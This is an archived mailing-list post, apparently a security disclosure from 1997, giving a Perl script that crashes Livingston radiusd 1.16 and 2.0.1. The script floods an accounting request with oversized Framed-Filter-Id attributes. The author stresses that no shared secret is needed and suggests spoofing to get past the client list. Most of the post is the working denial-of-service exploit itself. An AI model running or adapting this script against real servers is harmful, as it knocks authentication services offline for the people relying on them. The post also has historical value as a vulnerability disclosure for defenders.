--35897.31267.41812 Content-Type: text/plain Hi all the following will crash radiusd from livingston, 1.16 and 2.0.1 97/5/22 (the latest version) i alerted livingston a few months ago ... a bugfix should be available now one important thing is that you dont need the shared secret between the radius server and its clients to be able to crash it, since the accounting server will try to log the accounting request (though it will flag it as unverified) of course you need to be listed in the clients config file to be able to send an accounting request. otherwise spoof ;) --hamdi #!/usr/bin/perl use Authen::RadiusAcct; $r = new Authen::RadiusAcct(Host => 'your.radius.server:1646', Secret => 'any_string'); $r->load_dictionary; $r->add_attributes( {Name => 'User-Name', Value => 'anyuser'}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, ); $r->send_packet(4); } --35897.31267.41812--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:49:16 PDT